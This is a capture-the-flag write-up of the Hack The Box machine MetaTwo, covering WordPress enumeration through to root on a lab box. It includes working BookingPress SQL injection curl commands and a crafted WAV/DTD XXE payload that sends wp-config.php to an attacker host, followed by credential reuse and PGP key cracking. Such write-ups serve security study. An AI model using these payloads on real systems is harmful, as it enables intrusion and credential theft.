# MetaTwo - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

MetaTwo is a nice easy-rated HTB machine created by [Nauten](https://app.hackthebox.com/users/27582)

It starts with a SQL injection in the BookingPress Wordpress plugin to leak wordpress credentials.  
We then exploit an authenticated XXE within the media library to leak FTP credentials, and on FTP, we find SSH credentials.  
For root, we crack the password on the private PGP key associated with `passpie`.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.186
Nmap scan report for 10.10.11.186
Host is up (0.092s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 21,22,80 -oN metatwo.nmap 10.10.11.186
Nmap scan report for 10.10.11.186
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We have the standard SSH, FTP and HTTP ports here.  
`http-title` tells us the domain name; we can add it to `/etc/hosts`:

```text
10.10.11.186 metapress.htb
```

Visiting the website on port 80:

![1](images/1.png)

Running a `gobuster` scan in `vhost` mode yielded no results.  
Since the footer says "Proudly powered by WordPress", we can skip the usual `dir` enumeration and jump straight to Wordpress-specific enumeration.

## Wordpress enumeration with WPScan

I ran the usual command:

```console
opcode@parrot$ wpscan --url http://metapress.htb/ -e vp,vt --api-token 6e...WA
```

The scan takes a while, and the result is enormous.  
I dislike Wordpress on HTB boxes because there are too many false positives, especially if you do the box several months after release.

We can go through each one and root out the false positives.

```text
[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.18.0
 |  - X-Powered-By: PHP/8.0.24
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://metapress.htb/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://metapress.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
```

That's the usual stuff. Let us move to potential vulnerabilities:  
(I'll skip all XSS vulnerabilities because they are annoying. If it's XSS, I'd instead take a hint)

```text
 | [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8
 |     Fixed in: 5.6.3
 |     References:
 |      - https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/29378
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
 |      - https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
 |      - https://hackerone.com/reports/1095645
 |      - https://www.youtube.com/watch?v=3NBxcmqCgt4
```

Authenticated XXE, but we don't have any credentials. So we can skip it.

```text
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 5.6.3
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
```

Another one which needs authentication; we can skip it.

```text
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 5.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM
```

Object injection through Phar deserialization? Pretty cool, but I don't expect to see a deserialization exploit without PHPGGC on an easy box; skip.

```text
| [!] Title: WordPress 5.4 to 5.8 -  Lodash Library Update
 |     Fixed in: 5.6.5
 |     References:
 |      - https://wpscan.com/vulnerability/5d6789db-e320-494b-81bb-e678674f4199
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/lodash/lodash/wiki/Changelog
 |      - https://github.com/WordPress/wordpress-develop/commit/fb7ecd92acef6c813c1fde6d9d24a21e02340689
```

Well, the PoC is for node. I don't know how it could be exploited.

```text
 | [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
 |     Fixed in: 5.6.5
 |     References:
 |      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
```

The PoC for this one has not been disclosed publicly.

```text
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.6.6
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207
```

I don't think we can exploit this one.

```text
 | [!] Title: WordPress < 5.8 - Plugin Confusion
 |     Fixed in: 5.8
 |     References:
 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
```

It's a supply chain attack, and HTB boxes are isolated from internet, so not exploitable.

```text
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.6.7
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
```

The PoC for this one has not been disclosed publicly.

```text
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 5.6.7
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
```

It needs authentication, so skip.

```text
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 5.6.7
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
```

I could not find a PoC for this one.

```text
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 5.6.7
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469
```

The PoC for this one has not been disclosed publicly.

```text
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 5.6.8
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
```

I could not find a PoC for this one.

```text
 | [!] Title: WP < 6.0.2 - SQLi via Link API
 |     Fixed in: 5.6.9
 |     References:
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
```

I could not find a PoC for this one.

```text
 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
 |     Fixed in: 5.6.10
 |     References:
 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
```

The PoC for this one has not been disclosed publicly.

```text
 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
 |     Fixed in: 5.6.10
 |     References:
 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
```

It wouldn't be useful to us.

```text
 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
 |     Fixed in: 5.6.10
 |     References:
 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
```

I don't think we can exploit it.

```text
 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
 |     Fixed in: 5.6.10
 |     References:
 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
```

I could not find a PoC for this one.

```text
 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
 |     Fixed in: 5.6.10
 |     References:
 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
```

I could not find a PoC for this one.

```text
 | [!] Title: WP <= 6.1.1 - Unauthenticated Blind SSRF via DNS Rebinding
 |     References:
 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
```

This one needs some other vulnerability in tandem to be of any use.

I asked for a sanity check and learnt that the first vulnerability was in a plugin.  
In passive mode, wpscan can't be relied upon to find plugins.

## SQL injection in BookingPress

If we explore the website, we will find this page quickly: <http://metapress.htb/events/>  
In the page source, if we look at all script tags, we can learn that BookingPress v1.0.10 plugin is in use.  
It is vulnerable to a trivial SQL injection: <https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357>

They even have a payload for union injection. We can try to use it:

```console
opcode@parrot$ curl 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
{"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
```

Of course, it didn't work. We'd have to update our `wpnonce` as well.

```console
opcode@parrot$ curl -s -X POST 'http://metapress.htb/events/' | grep '_wpnonce' -m 1
var postData = { action:'bookingpress_generate_spam_captcha', _wpnonce:'361e6b22d4' };
```

The payload works now:

```console
opcode@parrot$ curl 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

**Testing for LOAD_FILE**

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT load_file('/etc/passwd'),1,2,3,4,5,6,7,8-- -' | jq '.[] | .bookingpress_service_id'
```

It didn't work

**Enumerate databases**

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(schema_name),1,2,3,4,5,6,7,8 from information_schema.schemata-- -' | jq '.[] | .bookingpress_service_id'
"information_schema,blog"
```

"blog" is the database which we should enumerate further.

**Enumerate tables**

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data "action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),1,2,3,4,5,6,7,8 from information_schema.tables where table_schema='blog'-- -" | jq '.[] | .bookingpress_service_id'
```

I was expecting it to work, but it didn't. I guessed it was due to all the quotes.  
I tried to URL encode, but that didn't work.

We can always get rid of quotes with hex strings in SQL queries.  
A python one-liner can be used to get hex strings:

```console
opcode@parrot$ python3 -c "print(__import__('binascii').hexlify(b'blog'))"
b'626c6f67'
```

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),1,2,3,4,5,6,7,8 from information_schema.tables where table_schema=0x626c6f67-- -' | jq '.[] | .bookingpress_service_id'
"wp_options,wp_term_taxonomy,wp_bookingpress_servicesmeta,wp_commentmeta,wp_users,wp_bookingpress_customers_meta,wp_bookingpress_settings,wp_bookingpress_appointment_bookings,wp_bookingpress_customize_settings,wp_bookingpress_debug_payment_log,wp_bookingpress_services,wp_termmeta,wp_links,wp_bookingpress_entries,wp_bookingpress_categories,wp_bookingpress_customers,wp_bookingpress_notifications,wp_usermeta,wp_terms,wp_bookingpress_default_daysoff,wp_comments,wp_bookingpress_default_workhours,wp_postmeta,wp_bookingpress_form_fields,wp_bookingpress_payment_logs,wp_posts,wp_term_relationships"
```

"wp_users", "wp_posts" and "wp_bookingpress_appointment_bookings" are the tables I'm curious about.

**Enumerate columns in wp_users**

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(column_name),1,2,3,4,5,6,7,8 from information_schema.columns where table_name=0x77705f7573657273-- -' | jq '.[] | .bookingpress_service_id'
"ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name"
```

**Listing data**

```console
opcode@parrot$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=361e6b22d4&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_nicename,0x3a,user_email,0x3a,user_pass),1,2,3,4,5,6,7,8 from wp_users-- -' | jq '.[] | .bookingpress_service_id'
"admin:admin@metapress.htb:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.,manager:manager@metapress.htb:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70"
```

We have couple hashes that we can attempt to crack with `john`:

```text
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
```

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It takes a while, but one of them cracks:

```text
manager:partylikearockstar
```

The password did not work on SSH or FTP.  
But it works on <http://metapress.htb/wp-admin>, and we can log in.

## Authenticated XXE Within the Media Library

The `manager` account has no privileges at all. We cannot upload malicious plugins or themes.  
We can only upload media files. I tried to get RCE through that, but nothing worked.

We can instead go back to WPScan results and look at the previously ignored vulnerabilities which require authentication.  
There are three potential vulnerabilities: Authenticated XXE Within the Media Library, Authenticated Password Protected Pages Exposure and Author+ Stored XSS via Post Slugs.  
We don't even have "Author+" privileges, so the third one is not exploitable.  
The second one needs "Contributor" role, so another failure.  
The first one is most likely to be exploited as we can upload WAV audio files to the media library.

They have a PoC at <https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5> and a more detailed write-up is available at <https://www.sonarsource.com/blog/wordpress-xxe-security-vulnerability/> as their researchers disclosed it in the first place.

First, we need to create a malicious `payload.wav`:

```xml
RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.76/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>
```

The XXXX are bytes that cannot be represented easily. Similarly, the BBBB is the length of our payload in little-endian.  
The length of our payload here is 128, so the length bytes should be `b'\x80\x00\x00\x00'`  
As for XXXX bytes, I looked at a legitimate WAV file and found it to be `b'\xab\x43\x03\x00'`

We can create the malicious file now:

```console
opcode@parrot$ echo -ne 'RIFF\xab\x43\x03\x00WAVE\x80\x00\x00\x00iXML<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY % sp SYSTEM "http://10.10.14.76/xxe.dtd">\n%sp;\n%param1;\n]>\n<r>&exfil;</r>>' > payload.wav
```

Then, we need a malicious `xxe.dtd`:

```xml
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.76/?%data;'>">
```

After uploading the `malicious.wav` file, I didn't get any requests for the `xxe.dtd`.

Debugging this part took a while. After comparing my payload with their payload at <https://hackerone.com/reports/1095645>, I learnt the format for WAV payload in their article and on <https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5> is wrong.  
Instead of `RIFFXXXXWAVEBBBBiXML`, it is supposed to be `RIFFXXXXWAVEiXMLBBBB`

```console
opcode@parrot$ echo -en 'RIFF\xab\x43\x03\x00WAVEiXML\x80\x00\x00\x00<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY % sp SYSTEM "http://10.10.14.76/xxe.dtd">\n%sp;\n%param1;\n]>\n<r>&exfil;</r>>' > payload.wav
```

Also, maybe due to the small size of the involved files, `zlib.deflate` is not needed either.  
So the `xxe.dtd` should be:

```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.76/?%data;'>">
```

This time, upon uploading the WAV file, the listener picked up the base64 encoded data.  
After base64 decoding, I got:

```php
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
 * WordPress Database Table prefix.
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
```

We have DB credentials as well as FTP credentials here. None of those worked for SSH

DB credentials:

```text
blog:635Aq@TdqrCwXFUZ
```

FTP credentials:

```text
metapress.htb:9NYS_ii@FyL_p5M2NvJ
```

## FTP

Since the FTP port is open on the box, those credentials can be used:

```console
opcode@parrot$ ftp metapress.htb
Connected to metapress.htb.
220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
Name (metapress.htb:opcode): metapress.htb
331 Password required for metapress.htb
Password: 9NYS_ii@FyL_p5M2NvJ
230 User metapress.htb logged in
```

```console
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
```

The blog directory contains source code for the wordpress website.  
In the mailer directory:

```console
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php
```

We can download that file:

```console
ftp> get send_email.php
local: send_email.php remote: send_email.php
200 PORT command successful
150 Opening BINARY mode data connection for send_email.php (1126 bytes)
226 Transfer complete
1126 bytes received in 0.00 secs (2.8111 MB/s)
```

Its contents are:

```php
<?php
/*
 * This script will be used to send an email to all our users when ready for launch
*/

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

require 'PHPMailer/src/Exception.php';
require 'PHPMailer/src/PHPMailer.php';
require 'PHPMailer/src/SMTP.php';

$mail = new PHPMailer(true);

$mail->SMTPDebug = 3;                               
$mail->isSMTP();            

$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;                          
$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";                           
$mail->SMTPSecure = "tls";                           
$mail->Port = 587;                                   

$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";

$mail->addAddress("info@metapress.htb");

$mail->isHTML(true);

$mail->Subject = "Startup";
$mail->Body = "<i>We just started our new blog metapress.htb!</i>";

try {
    $mail->send();
    echo "Message has been sent successfully";
} catch (Exception $e) {
    echo "Mailer Error: " . $mail->ErrorInfo;
}
```

Another leak of credentials:

```text
jnelson:Cb4_JmWM8zUZWMu@Ys
```

They work for SSH:

```console
opcode@parrot$ sshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh -o StrictHostKeyChecking=no jnelson@metapress.htb
```

## Cracking private key password for `passpie`

I transferred `pspy` to the box, but it didn't find anything.

```console
jnelson@meta2:~$ cat /proc/mounts | grep hidepid
proc /proc proc rw,relatime,hidepid=invisible 0 0
```

`/proc` has been mounted with the `hidepid` option, so we cannot find anything with `pspy`.

We can also run `linpeas.sh`, but there isn't much to look at.  
There's this line of interest:

```text
══╣ Possible private SSH keys were found!
/home/jnelson/.passpie/.keys
```

`passpie` is an open-source password manager: <https://github.com/marcwebbie/passpie>

```console
opcode@parrot$ jnelson@meta2:~$ passpie list
╒════════╤═════════╤════════════╤═══════════╕
│ Name   │ Login   │ Password   │ Comment   │
╞════════╪═════════╪════════════╪═══════════╡
│ ssh    │ jnelson │ ********   │           │
├────────┼─────────┼────────────┼───────────┤
│ ssh    │ root    │ ********   │           │
╘════════╧═════════╧════════════╧═══════════╛
```

`root` password is stored here, but we can't see it directly.  
We can look inside the directory:

```console
jnelson@meta2:~/.passpie$ ls -la
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .
drwxr-xr-x 5 jnelson jnelson 4096 Dec 21 15:28 ..
-r-xr-x--- 1 jnelson jnelson    3 Jun 26 13:57 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 13:58 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh
```

The file `.keys` contains a public and a private PGP key.  
I copied the private PGP key to my VM and tried to crack the password with `john`:

```console
opcode@parrot$ gpg2john key_pvt > hash
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It quickly cracks to

```text
blink182         (Passpie)
```

I tried to use this password with `passpie`:

```console
jnelson@meta2:~$ passpie copy root@ssh
Passphrase: blink182
```

It worked, but I didn't get the password in my clipboard.  
I tried the export option next:

```console
jnelson@meta2:~$ passpie export jnelson@ssh
Passphrase: blink182
```

It worked:

```console
jnelson@meta2:~$ cat jnelson\@ssh 
credentials:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
```

This password works for root:

```console
jnelson@meta2:~$ su -
Password: p7qfAZt4_A1xo_0x
root@meta2:~# id
uid=0(root) gid=0(root) groups=0(root)
```
